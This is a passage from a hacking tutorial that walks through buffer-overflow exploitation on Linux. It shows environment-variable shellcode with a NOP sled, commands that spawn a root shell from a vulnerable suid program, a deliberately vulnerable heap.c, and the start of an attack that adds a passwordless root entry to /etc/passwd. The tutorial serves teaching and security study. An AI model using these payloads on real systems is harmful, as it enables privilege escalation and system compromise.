0xbffffe55:     "SSH_CONNECTION=10.10.10.107 3108 10.10.11.110 22"
0xbffffe86:     "_=/bin/sh"
0xbffffe90:     "SHELL=/bin/sh"
0xbffffe9e:     "JDK_HOME=/opt/sun-jdk-1.4.0"
0xbffffeba:     "HOME=/home/matrix"
0xbffffecc:     "TERM=linux"
0xbffffed7:     "PATH=/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/opt/sun-jdk-1.4.0/bin:/opt/sun-jdk-1.4.0/jre/bin:/opt/insight/bin:.:/opt/j2re1.4.1/bin:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin:/sbin"...
0xbfffff9f:     ":/usr/sbin:/usr/local/sbin:/sbin:/usr/sbin:/usr/local/sbin"
0xbfffffda:     "SSH_TTY=/dev/pts/1"
0xbfffffed:     "/hacking/vuln2"
0xbffffffc:     ""
0xbffffffd:     ""
0xbffffffe:     ""
(gdb) x/s 0xbffffce5
0xbffffce5:     "SHELLCODE=", '\220' <repeats 100 times>, "1\300\260F1\3331\311\315\200\353\026[1\300\210C\a\211[\b\211C\f\260\v\215K\b\215S\f\315\200\350\345\377\377\377/bin/sh"
(gdb) x/s 0xbffffcf5
0xbffffcf5:     '\220' <repeats 94 times>, "1\300\260F1\3331\311\315\200\353\026[1\300\210C\a\211[\b\211C\f\260\v\215K\b\215S\f\315\200\350\345\377\377\377/bin/sh"
(gdb) quit
The program is running.  Exit anyway? (y or n) y

After finding the address where the environment variable SHELLCODE is located, the command x/s is used to examine just that string. But this address includes the string "SHELLCODE=", so 16 bytes are added to the address to provide an address that is located somewhere in the NOP sled. The 100 bytes of the NOP sled provide quite a bit of wiggle room, so there's no need to be exact. The debugger has revealed that the address 0xbffffcf5 is right near the beginning of the NOP sled, with the shellcode following it. Armed with this knowledge, some more Perl, and a pair of grave accents, the vulnerable program can be exploited, as follows:

$ ./vuln2 `perl -e 'print "\xf5\xfc\xff\xbf"x10;'`
sh-2.05a# whoami
root
sh-2.05a#

Once again, the threshold of how long the overflow buffer really needs to be can be quickly investigated. As the following experiments show, 32 bytes is as small as the buffer can get and still overwrite the return address:

$ ./vuln2 `perl -e 'print "\xf5\xfc\xff\xbf"x10;'`
sh-2.05a# exit
$ ./vuln2 `perl -e 'print "\xf5\xfc\xff\xbf"x9;'`
sh-2.05a# exit
$ ./vuln2 `perl -e 'print "\xf5\xfc\xff\xbf"x8;'`
sh-2.05a# exit
$ ./vuln2 `perl -e 'print "\xf5\xfc\xff\xbf"x7;'`
Segmentation fault
$

Another way to retrieve the address of an environment variable is to write a simple helper program. This program can simply use the well-documented getenv() function to look for the first program argument in the environment. If it can't find the variable, the program exits with a status message, and if it finds it, it prints out the variable's address.
getenvaddr.c code

   #include <stdio.h>
   #include <stdlib.h>

   int main(int argc, char *argv[])
   {
      char *addr;

      if(argc < 2)
      {
         printf("Usage:\n%s <environment variable name>\n", argv[0]);
         exit(0);
      }
      addr = getenv(argv[1]);
      if(addr == NULL)
         printf("The environment variable %s doesn't exist.\n", argv[1]);
      else
         printf("%s is located at %p\n", argv[1], addr);
      return 0;
   }

The following shows the getenvaddr.c program's compilation and execution to find the address of the environment variable SHELLCODE:

$ gcc -o getenvaddr getenvaddr.c
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffcec
$

This program returns a slightly different address than gdb did. This is because the context for the helper program is slightly different than when the vulnerable program is executed, which in turn is slightly different than when the vulnerable program is executed inside gdb. Luckily, the 100 bytes of NOP sled are more than enough to allow these slight inconsistencies to slide:

$ ./vuln2 `perl -e 'print "\xec\xfc\xff\xbf"x8;'`
sh-2.05a# whoami
root
sh-2.05a#

Just slapping a huge NOP sled to the front of shellcode, however, is like playing pool with slop. Sure, the root shell pops up or the balls go in, but oftentimes it's by accident, and the experience doesn't teach that much. Playing with slop is for amateurs — the experts can sink balls exactly in the pockets they call. In the world of program exploitation, the difference is between knowing exactly where something will be in memory and just guessing.

In order to be able to predict an exact memory address, the differences in the addresses must be explored. The length of the name of the program being executed seems to have an effect on the address of the environment variables. This effect can be further explored by changing the name of the helper program and experimenting. This type of experimentation and pattern recognition is an important skill set for a hacker to have:

$ gcc -o a getenvaddr.c
$ ./a SHELLCODE
SHELLCODE is located at 0xbffffcfe
$ cp a bb
$ ./bb SHELLCODE
SHELLCODE is located at 0xbffffcfc
$ cp bb ccc
$ ./ccc SHELLCODE
SHELLCODE is located at 0xbffffcfa

As the preceding experiment shows, the length of the name of the executing program has an effect on the location of exported environment variables. The general trend is a decrease of 2 bytes in the address of the environment variable for every single-byte increase in the length of the program name. This continues to hold true with the program name getenvaddr: the difference in length between the names getenvaddr and a is 9 bytes, and the difference between the addresses 0xbffffcfe and 0xbffffcec is 18 bytes.

Armed with this knowledge, the exact address of the environment variable can be predicted when the vulnerable program is executed. This means the crutch of a NOP sled can be eliminated:

$ export SHELLCODE=`cat shellcode`
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffd50
$

Because the name of the vulnerable program is vuln2, which is 5 bytes long, and the name of the helper program is getenvaddr, which is 10 bytes long, the address of the shellcode will be 10 bytes higher when the vulnerable program is executed, since the helper program's name is 5 bytes longer than the vulnerable program's name. Some basic math reveals that the predicted shellcode address when the vulnerable program is executed should be 0xbffffd5a:

$ ./vuln2 `perl -e 'print "\x5a\xfd\xff\xbf"x8;'`
sh-2.05a# whoami
root
sh-2.05a#
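The prediction rule just used can be written down as a tiny program. This sketch is my own formalization of the pattern observed above, not from the original text; it assumes the 2-bytes-per-name-byte relationship holds on the system in question:

   #include <stdio.h>
   #include <string.h>

   int main(void)
   {
      unsigned long helper_addr = 0xbffffd50;  /* address reported by ./getenvaddr */
      const char *helper = "getenvaddr";       /* name of the helper program       */
      const char *target = "vuln2";            /* name of the vulnerable program   */

      /* Each extra byte of program name shifts the environment variable
         by 2 bytes, so the shorter target name means a higher address. */
      unsigned long predicted = helper_addr + 2 * (strlen(helper) - strlen(target));

      printf("Predicted address in %s: 0x%lx\n", target, predicted);
      return 0;
   }

For these values it prints 0xbffffd5a, matching the address used in the successful exploit above.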
This type of surgical precision is definitely good practice, but it isn't always necessary. The knowledge gained from this experimentation can help calculate how long the NOP sled should be, though. As long as the helper program's name is longer than the name of the vulnerable program, the address the helper reports and the actual address when the vulnerable program is executed will differ by a predictable amount — 2 bytes for every byte of difference in the lengths of the two program names — and a small NOP sled before the shellcode in the environment variable will neatly compensate for this difference. The size of the necessary NOP sled can be easily calculated. Because a vulnerable program name needs at least one character, the maximum difference in the program name lengths will be the length of the helper program's name minus one. In this case, the helper program's name is getenvaddr, which means the NOP sled should be 18 bytes long, because the address is adjusted by 2 bytes for every single byte of difference: (10 − 1) · 2 = 18.

0x280 Heap- and bss-Based Overflows

In addition to stack-based overflows, there are buffer-overflow vulnerabilities that can occur in the heap and bss memory segments. While these types of overflows aren't as standardized as stack-based overflows, they can be just as effective. Because there's no return address to overwrite, these types of overflows depend on important variables being stored in memory after a buffer that can be overflowed. If an important variable — such as one that keeps track of user permissions or authentication state — is stored after an overflowable buffer, that variable can be overwritten to grant full permissions or to set authentication. Or if a function pointer is stored after an overflowable buffer, it can be overwritten, causing the program to call a different memory address (where shellcode would be) when the function pointer is eventually called. Because overflow exploits in the heap and bss memory segments are much more dependent on the layout of memory in the program, these types of vulnerabilities can be harder to spot.
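To make the function-pointer scenario concrete, here is a contrived sketch — my own illustration, not from the original text. Whether fp really lands directly after buffer in the bss segment is compiler- and layout-dependent, which is exactly the point made above:

   #include <stdio.h>
   #include <string.h>

   static char buffer[16];        /* uninitialized global -> bss segment */
   static void (*fp)(void);       /* function pointer stored (ideally) right after buffer */

   void normal(void)   { printf("normal function\n"); }
   void hijacked(void) { printf("execution was redirected\n"); }

   int main(int argc, char *argv[])
   {
      fp = normal;
      if(argc > 1)
         strcpy(buffer, argv[1]); /* no bounds check: long input can spill into fp */
      fp();                       /* calls whatever address fp now holds */
      return 0;
   }

If input longer than 16 bytes overwrites fp with the address of hijacked() — or of injected shellcode — the call through fp transfers control there instead of to normal().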
0x281 A Basic Heap-Based Overflow

The following program is a simple note-taking program, which is vulnerable to a heap-based overflow. It's a fairly contrived example, but that's why it's an example and not a real program. Debugging information has also been added.

heap.c code

   #include <stdio.h>
   #include <stdlib.h>
   #include <string.h>

   int main(int argc, char *argv[])
   {
      FILE *fd;

      // Allocating memory on the heap
      char *userinput = malloc(20);
      char *outputfile = malloc(20);

      if(argc < 2)
      {
         printf("Usage: %s <input string>\n", argv[0]);
         exit(0);
      }

      // Copy data into heap memory
      strcpy(outputfile, "/tmp/notes");
      strcpy(userinput, argv[1]);

      // Print out some debug messages
      printf("---DEBUG--\n");
      printf("[*] userinput @ %p: %s\n", userinput, userinput);
      printf("[*] outputfile @ %p: %s\n", outputfile, outputfile);
      printf("[*] distance between: %d\n", outputfile - userinput);
      printf("----------\n\n");

      // Writing the data out to the file.
      printf("Writing to \"%s\" to the end of %s...\n", userinput, outputfile);
      fd = fopen(outputfile, "a");
      if (fd == NULL)
      {
         fprintf(stderr, "error opening %s\n", outputfile);
         exit(1);
      }
      fprintf(fd, "%s\n", userinput);
      fclose(fd);

      return 0;
   }

In the following output, the program is compiled, set suid root, and executed to demonstrate its functionality:

$ gcc -o heap heap.c
$ sudo chown root.root heap
$ sudo chmod u+s heap
$
$ ./heap testing
---DEBUG--
[*] userinput @ 0x80498d0: testing
[*] outputfile @ 0x80498e8: /tmp/notes
[*] distance between: 24
----------

Writing to "testing" to the end of /tmp/notes...
$ cat /tmp/notes
testing
$ ./heap more_stuff
---DEBUG--
[*] userinput @ 0x80498d0: more_stuff
[*] outputfile @ 0x80498e8: /tmp/notes
[*] distance between: 24
----------

Writing to "more_stuff" to the end of /tmp/notes...
$ cat /tmp/notes
testing
more_stuff
$

This is a relatively simple program that takes a single argument and appends that string to the file /tmp/notes. One important detail to notice is that the memory for the userinput variable is allocated on the heap before the memory for the outputfile variable. The debugging output from the program helps make this clear: userinput is located at 0x80498d0, and outputfile is located at 0x80498e8. The distance between these two addresses is 24 bytes. Because the first buffer is null terminated, the maximum amount of data that can be put into it without overflowing into the next should be 23 bytes. This can be quickly tested by trying 23- and 24-byte arguments:

$ ./heap 12345678901234567890123
---DEBUG--
[*] userinput @ 0x80498d0: 12345678901234567890123
[*] outputfile @ 0x80498e8: /tmp/notes
[*] distance between: 24
----------

Writing to "12345678901234567890123" to the end of /tmp/notes...
$ cat /tmp/notes
testing
more_stuff
12345678901234567890123
$ ./heap 123456789012345678901234
---DEBUG--
[*] userinput @ 0x80498d0: 123456789012345678901234
[*] outputfile @ 0x80498e8:
[*] distance between: 24
----------

Writing to "123456789012345678901234" to the end of ...
error opening
$ cat /tmp/notes
testing
more_stuff
12345678901234567890123
$

As predicted, 23 bytes fit into the userinput buffer without any problem, but when 24 bytes are tried, the null-termination byte overflows into the beginning of the outputfile buffer. This causes outputfile to be nothing but a single null byte, which obviously cannot be opened as a file. But what if something besides a null byte were overflowed into the outputfile buffer?

$ ./heap 123456789012345678901234testfile
---DEBUG--
[*] userinput @ 0x80498d0: 123456789012345678901234testfile
[*] outputfile @ 0x80498e8: testfile
[*] distance between: 24
----------

Writing to "123456789012345678901234testfile" to the end of testfile...
$ cat testfile
123456789012345678901234testfile
$

This time the string testfile was overflowed into the outputfile buffer, causing the program to write to testfile instead of /tmp/notes, as it was originally programmed to do. A string is read until a null byte is encountered, so the entire string is written to the file as the userinput. Because this is a suid program that appends data to a filename that can be controlled, data can be appended to any file. The data does have one restriction, though: it must end with the controlled filename.

There are probably several clever ways to exploit this type of capability. The most apparent one would be to append something to the /etc/passwd file. This file contains all of the usernames, IDs, and login shells for all the users of the system. Naturally, this is a critical system file, so it is a good idea to make a backup copy before messing with it too much.
$ cp /etc/passwd /tmp/passwd.backup
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
man:x:13:15:man:/usr/man:/bin/false
nobody:x:65534:65534:nobody:/:/bin/false
matrix:x:1000:100::/home/matrix:
sshd:x:22:22:sshd:/var/empty:/dev/null
$

The fields in the /etc/passwd file are delimited by colons: the first field is the login name, followed by the password, user ID, group ID, username, home directory, and finally the login shell. The password fields are all filled with the x character, because the encrypted passwords are stored elsewhere, in a shadow file. However, if this field is left blank, no password will be required. In addition, any entry in the password file that has a user ID of 0 will be given root privileges. That means the goal is to append an extra entry to the password file that has root privileges but that doesn't ask for a password. The line to append should look something like this:

myroot::0:0:me:/root:/bin/bash

However, the nature of this particular heap overflow exploit won't allow that exact line to be written to /etc/passwd, because the string must end with /etc/passwd. However, if that filename is merely appended to the end of the entry, the passwd file entry would be incorrect. This can be compensated for with th